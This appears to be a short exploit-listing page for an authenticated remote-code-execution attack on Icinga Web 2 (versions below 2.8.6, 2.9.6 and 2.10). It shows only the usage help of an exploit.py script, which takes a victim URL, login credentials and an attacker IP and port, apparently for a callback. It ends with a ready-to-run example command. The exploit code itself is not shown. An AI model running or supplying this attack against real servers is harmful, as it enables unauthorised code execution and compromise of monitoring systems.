
Icinga Web 2 - Authentifizierte Remote-Code-Ausführung <2.8.6, <2.9.6, <2.10
Icinga Web 2 - Authentifizierte Remote-Code-Ausführung <2.8.6, <2.9.6, <2.10
usage: exploit.py [-h] -u URL -U USER -P PASSWORD -i IP -p PORT
Welcome.
options:
-h, --help show this help message and exit
-u URL, --url URL Insert URL http://ip_victima
-U USER, --user USER Insert user -U user
-P PASSWORD, --password PASSWORD
Insert password -P password
-i IP, --ip IP Insert IP_ATTACK -i IP
-p PORT, --port PORT Insert PORT_ATTACK -p PORT
python3 exploit.py -u http://localhost -U admin -P admin123 -i 192.168.1.1 -p 443